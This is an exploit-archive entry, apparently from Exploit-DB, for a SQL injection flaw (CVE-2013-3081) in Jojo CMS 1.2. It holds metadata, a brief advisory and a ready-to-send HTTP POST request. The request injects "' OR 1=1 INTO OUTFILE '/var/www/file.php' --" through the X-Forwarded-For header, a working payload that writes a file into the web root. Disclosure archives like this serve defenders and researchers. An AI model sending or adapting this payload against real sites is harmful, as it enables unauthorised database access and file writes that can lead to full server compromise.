Jojo CMS - 'x-forwarded-for' HTTP header SQL Injection

Author: High-Tech Bridge SA
type: webapps
platform: php
port: 
date_added: 2013-05-15  
date_updated: 2015-10-23  
verified: 1  
codes: CVE-2013-3081;OSVDB-93437  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 38519.txt  
source: https://www.securityfocus.com/bid/59934/info

Jojo CMS is prone to an SQL-injection vulnerability because it fails to sanitize user-supplied input.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Jojo CMS 1.2 is vulnerable; other versions may also be affected.

POST /articles/test/ HTTP/1.1
X-Forwarded-For: ' OR 1=1 INTO OUTFILE '/var/www/file.php' --
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
name=name&email=user%40mail.com&website=&anchortext=&comment=comment&submit=Post+Comment